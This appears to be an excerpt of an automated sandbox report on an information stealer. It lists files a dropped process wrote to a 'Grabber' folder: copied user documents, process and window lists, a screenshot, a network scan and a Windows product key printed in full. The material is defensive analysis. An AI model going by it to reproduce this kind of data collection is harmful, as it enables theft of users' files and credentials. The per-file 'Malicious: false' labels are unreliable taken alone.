C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17264
Entropy (8bit):	5.69544679328736
Encrypted:	false
SSDEEP:	96:HzFXTdqBUEIctw2zqmTB9stgf9wBMwTmfJg1Wx1HJ2:HdTdqBUEI52mmYtE2MwTm6Wx1p2
MD5:	29E1A048B32C8E36E6428FA8A51B16F3
SHA1:	C1E0F9889350A3A5D0C98A670DBCB4DC43D0D07E
SHA-256:	677FB402DA27C33F26575CD8FF127C631198593256B467263636A03213637611
SHA-512:	D7B377293FFE09E6FF059C59C51945110EA48F3F6E45CE98535DEF76DDF98F0F36E1C284281140F103A4E281A208C763051757F08C0752C363D3B041E4CB8BBF
Malicious:	false
Reputation:	unknown
Preview:	NAME: svchost..PID: 2152..EXE: ..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE..PID: 5164..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost..PID: 6024..EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost..PID: 784..EXE: ..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: ..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqN

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.814371943179627
Encrypted:	false
SSDEEP:	3:IEqdVoq:IEqn9
MD5:	07891FA9AD66325DD8D52FD3E1D9589A
SHA1:	781C0458F84526977DC075FF0338F19170AFBA75
SHA-256:	6DFC01037FEE4B222086A6F1EDF201BF7952C5B6F9090F30DD30320972632005
SHA-512:	E8D7F00221CC9E681133506B27428384A3F96F62EB6AB749032D861396B160427BEC354AAECF3B062541F88D78CC389922D520DC7E1B1119182102950E72165E
Malicious:	false
Reputation:	unknown
Preview:	PJN2K-W4T8B-J6J38-PMMTG-MPDD4

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Reputation:	unknown
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	14637
Entropy (8bit):	5.642697713926756
Encrypted:	false
SSDEEP:	48:DyCayCDyCQNyCdyCcyCgyCFyCIyC8yCLyCuyCAyCUyCJyCoyCJyzFMfNyCSyCYy9:xyzqTc5J8Ed
MD5:	9516B94F40084A0D5C091AC96ADF9C1C
SHA1:	67135EA254D25BF55DAC1A3F99C96634D9B989E1
SHA-256:	9758EDB4922E3FDC5B30F4E78D00A76C70C426058587F90005FECAC67FFAFBCD
SHA-512:	F865376C17B0B428D76A5886118ED47DB6042CC8A85EAFD7C856F5EDC63C54FD81E8BF261BF8C6B56F93CB9C8FBB70ED15869B0FB03E84DBC5A4D704FC63F8A2
Malicious:	false
Reputation:	unknown
Preview:	NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Ch

C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	76444
Entropy (8bit):	7.772236064360945
Encrypted:	false
SSDEEP:	1536:C3IPMZurfQ4pchCNj4Sqzd3bG/KkifU8iwWuCrUfxrNgiMV/pU:eI0ZyI4pcgqzdr8XHXz4fHPMV/pU
MD5:	108D62E094BD5022B9DD5F428F42E0D2
SHA1:	762A43D03FC87553E5A1D0E0CF2CDF5C1995DA3B
SHA-256:	BEEE6F91FFFF6B2087DD593DDFC7E067D5C5A6CF7DF9D60C8F9693E83C977BFE
SHA-512:	0F6F4D8411F72D9C425B6B86AAAEC76A36A2436E5FA442AE0A0FC20C9B54C8238B63E6B65671E441CB4E6E5E2591EA08F074F94FC4F0ECD8DADF438F96514F6D
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........;Yd@....1...m...g>....Vr....cFr....1mn..{}...D.q.........e..5.R....a..Y..z.8?.GZ...-5..JZ).J)h........;...zA...^.....^..g._k...v..gb..._.b.[............y..g.,.c..:...qtk..........Ek..E..s..Q@....-..Q.c>...6.:.uj*q.f.iJ..ba.]..#Z..6................j...>......_#.....D..7.....I..........J.j...Bt]..QEjb.QE....k;U......!%..3....Ft.......5.[...p.oo;~....l

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3CBD.tmp.Installer.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\accc.exe.log

Download File

Process:	C:\ProgramData\KMSAuto\accc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.38575581059626
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
MD5:	E918A9A81162ACCFD3E06E02E11CB6C8
SHA1:	10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
SHA-256:	912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
SHA-512:	78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
Malicious:	false
Reputation:	unknown
